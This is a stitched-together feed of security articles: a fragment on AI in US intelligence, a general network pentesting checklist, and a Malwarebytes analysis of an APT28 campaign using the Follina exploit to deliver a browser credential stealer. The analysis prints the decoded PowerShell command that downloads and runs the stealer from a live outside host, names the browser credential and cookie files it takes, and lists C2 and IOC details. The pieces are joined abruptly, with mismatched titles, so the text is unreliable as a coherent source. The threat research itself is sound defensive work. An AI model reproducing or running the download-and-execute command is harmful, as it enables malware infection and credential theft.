As AI is expected to increasingly augment or automate analysis for the intelligence community, it has become urgent to develop and implement standards and methods, which are both scientifically sound and ethical for law enforcement and national security contexts. While intelligence analysts grapple with how to match AI’s opacity to the evidentiary standards and argumentation methods required for the law enforcement and intelligence contexts, the same struggle can be found in understanding analysts’ unconscious reasoning, which can lead to accurate or biased conclusions.

The Power and Pitfalls of AI for US Intelligence

By Owais Sultan
Network pentesting is a frequently used and successful method of recognizing security issues in a company’s IT infrastructure.…
This is a post from HackRead.com Read the original post: Network Pentesting Checklist

Network pentesting is a frequently used and successful method of recognizing security issues in a company’s IT infrastructure. This entails completing a vulnerability scan of the IT system by “ethically hacking” equipment, protocols, or apps to simulate a real-world assault.

Pentesting, whether used in conjunction with a network pentesting checklist or via a vulnerability management service provider, may assist to minimize cyber security threats and guarantee that the data is not compromised in the event of a genuine attack.

By detecting system vulnerabilities, diagnosing live systems, and applications, and capturing system flags, network penetration testing identifies flaws in the system architecture.

**Benefits of Network Pentesting Checklist:**

Pentesting assists administrators in closing unneeded ports, enabling extra services, hiding or customizing banners, debugging services, & calibrating firewall rules. One must test everything to ensure there will be no security flaws.

Following a thorough Network pentesting checklist, the Tester is capable of recognizing all potential threats that the company faces. The network penetration tester’s findings assist firms in formulating an efficient approach to recognize & correct the problems uncovered during testing.

**1\. Discovering Information about Targeted System**

In the first phase of the network pentesting checklist, the tester assembles ample data related to the intended system architecture as feasible.

This must be evidence that can be beneficial to revealing security issues.

Experts utilized programs like Nmap to detect the IP information if they simply have IP addresses operated with.

Nmap is a program that extracts DNS archives for a single IP address.

With all of these programs, the tester will be capable of distinguishing different devices in the system infrastructure, their activity, and the application server they are using.

Since some software releases include security flaws, we’ll have these facts in phase two of the network penetration testing checklist.

The accessibility and availability of system holes are another critical piece of data to consider when constructing an assault scenario.

Tester is able to identify and enroll all open access points throughout the network using Nmap once more.

Malevolent hackers frequently utilize open ports to get illegal or hidden system access and download harmful malware.

**2\. Threat Modeling**

It’s time to put intelligence to work upon gathering data possible for the intended network.

The second stage in this network pentesting checklist is to utilize all discovered data to check the network for major weaknesses.

We’re merely attempting to gather a record of different weaknesses in the system at this stage, rather than assaulting them to check if they’re vulnerable.

While system testing can be used to detect network security problems, a more comprehensive approach incorporates human tests conducted by genuine experts.

At this phase, a network pentesting application like the Metasploit program obtains critical data about protection issues on an intended infrastructure. It detects all open holes, threats, and security issues on a chosen system with a really small proportion of false positives.

Other threat assessment software, such as Nessus, can help discover software flaws and data breaches.

Nmap may be used to detect security weaknesses for prospective attacks on the targeted system using statistics on windows os and releases.

Let’s move on to phase 3 now because we’ve discovered all of the possible flaws.

**3\. Inspection of Vulnerabilities**

First and foremost, remember not all issues are worthwhile exploiting.

The vulnerability scanning programs utilized during phase 2 generated reports; then it’s good to evaluate & classify the protection issues according to their severity and likelihood.

We may create an attack strategy to expose real-world attack pathways utilizing different types of data.

The purpose of the vulnerability analysis stage is to find an acceptable point for an attack so we don’t spend energy on useless chores.

We may also construct a graphical diagram at this phase to assist the tester to comprehend the basic infrastructure pathway. Testers also build proxies to utilize in the next phase to stay confidential: half of the penetration testing procedure is the identification and reaction to an intrusion. Is the intended firm’s IT personnel aware that an intruder has acquired reach to the open holes? We’ll see what happens.

Now that you’ve selected the most appealing targets for exposure, it’s important to figure out the best assault routes for the vulnerabilities you’ve discovered.

**4\. Exploitation**

Exploitation is the procedure of analyzing a system’s flaws to check if it can be misused or not. It permits the tester to explain to customers different issues they must address right away.

Metasploit is the exploiting program we frequently utilize in pentesting.

We might employ password cracking programs based on the complexity of the problem, to test the safety of system passwords.

Some significant unit testing operations that are frequently time-consuming may be included in this ethical hacking testing phase. Code injection, password hacking, stack overflow, and OS commands are just a few examples of how vulnerabilities may be exposed.

Based on the extent of the project, significant ethical hacking may be used at this phase.

The core of phase 4 is to hire the best-skilled specialists since this phase relies on clever poking by a live penetration tester.

**5\. Reporting & documenting network pentesting**

Not only must an excellent system pentest report provide a description of the whole pentesting process, but this should also provide a priority list of the weaknesses that need to be tackled.

A well-written penetration test document contains a description of security issues evidence and also screenshots of the assaults, and a defined roadmap for correcting all vulnerabilities uncovered.

Because network pentesting was created for this purpose.

**Conclusion:**

It is vital to adopt a reliable network pentesting technique at all times. Using the checklist, companies can see how a professionally educated expert might plan a massive system assault while at the same time avoiding all loopholes. Although there is not a single checklist that is fit for every network pentesting, the procedures outlined above should serve as a decent starting point for practically any business seeking a network pentesting guide.

**More Security, Vulnerability and Pentesting Topics**

*   5 Reasons You Should Learn About Cyber Security
*   Vulnerable smart alarms allowed hackers to track & turn off car engine
*   Thousands of Internet connected hot tubs vulnerable to remote attacks
*   Smartwatch vulnerability allowed hackers to overdose dementia patients
*   Download Kali Linux 2021.3 with Kali NetHunter on smartwatch, new tools

Network Pentesting Checklist

Threat actors associated with Russian intelligence are using the fear or nuclear war to spread data-stealing malware in Ukraine.
The post Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine appeared first on Malwarebytes Labs.

_This blog post was authored by Hossein Jazi and Roberto Santos_.

In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.

APT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and US organizations, including US nuclear facilities.

On June 20, 2022, Malwarebytes Threat Intelligence identified a document that had been weaponized with the Follina (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by Google. The discovery was also made independently by CERT-UA.

Follina is a recently-discovered zero-day exploit that uses the ms-msdt protocol to load malicious code from Word documents when they are opened. This is the first time we’ve observed APT28 using Follina in its operations.

**The malicious document**

The maldoc’s filename, Nuclear Terrorism A Very Real Threat.rtf, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict.

The content of the document is an article from the Atlantic Council called “_Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions_” published on May 10 this year.

The lure asks “Will Putin use nuclear weapons in Ukraine?”

The maldoc is an RTF file compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268.frge.io/article.html.

The malicious HTML document

The HTML file uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme. The decoded script uses cmd to run PowerShell code that downloads and executes the final payload:

    "C:\WINDOWS\system32\cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}"

**Payload Analysis**

The final payload is a variant of a stealer APT28 has used against targets in Ukraine before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup.

In older versions of the stealer, a fake error message distracted users

The variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.

A side-by-side comparison of two versions of the APT28 stealer

As with the previous variant, the stealer’s main pupose is to steal data from several popular browsers.

**Google Chrome and Microsoft Edge**

The malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data.

Debugging session showing how attackers are capable of stealing credentials

In a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies.

Cookie stealing code (Google Chrome)

Stolen cookies can sometimes be used to break into websites even if the username and password aren’t saved to the browser.

The code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.

**Firefox**

This malware can also steal data from Firefox. It does this by iterating through every profile looking for the cookies.sqlite file that stores the cookies for each user.

Sysmon capturing access to cookies.sqlite file

In the case of passwords, the attackers attempt to steal logins.json, key3.db, key4.db, cert8.db, cert9.db, signons.sqlite.

Attackers will grab also passwords from Firefox

These files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (signons.sqlite, key3.db and cert8.db are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.

**Exfiltrating data**

The malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.

The IMAP login event

The old variant of this stealer connected to mail\[.\]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc\[.\]com. Interestingly both are located in Dubai.

It’s likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.

Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.

For more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has targeted Russia repeatedly since Ukraine invasion.

**Protection**

Malwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.

**IOCs**

**Maldoc:  
**Nuclear Terrorism A Very Real Threat.rtf  
daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01

**Remote template (Follina):  
**http://kitten-268.frge\[.\]io/article.html

**Stealer:  
**http://kompartpomiar\[.\]pl/grafika/docx.exe  
2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933

**C2:  
**www.specialityllc\[.\]com

Tag

#intel